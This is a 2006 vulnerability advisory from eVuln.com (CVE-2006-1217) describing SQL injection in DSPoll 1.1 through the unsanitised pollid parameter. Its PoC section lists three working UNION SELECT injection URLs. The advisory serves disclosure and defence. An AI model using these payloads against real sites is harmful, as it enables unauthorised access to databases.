Multiple SQL Injection Vulnerabilities in DSPoll

Summary

Vulnerability: Multiple SQL Injection Vulnerabilities in DSPoll
Discovered: 2006.03.12
Last Update: 2006.03.23 Exploitation code published
ID: EV0096
CVE: CVE-2006-1217
Risk Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
Vendor: n/a
Vulnerable Software: DSPoll (http://dsportal.uw.hu/)
Version: 1.1
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in DSPoll (http://dsportal.uw.hu/) script.

Vulnerable scripts:
include/results.php
include/topolls.php
include/pollit.php

Variable $pollid isn't properly sanitized before being used in the SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

SQL Injection Examples:

http://[host]/dspoll/index.php?open=pollresults&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

http://[host]/dspoll/index.php?open=topolls&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

http://[host]/dspoll/index.php?open=pollit&pollid=9999'%20union%20select%201,2/*

Solution.

Solution for "Multiple SQL Injection Vulnerabilities in DSPoll" is not available. Check vendor's website for updates.

Multiple SQL Injection Vulnerabilities in DSPoll

Summary

Description

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools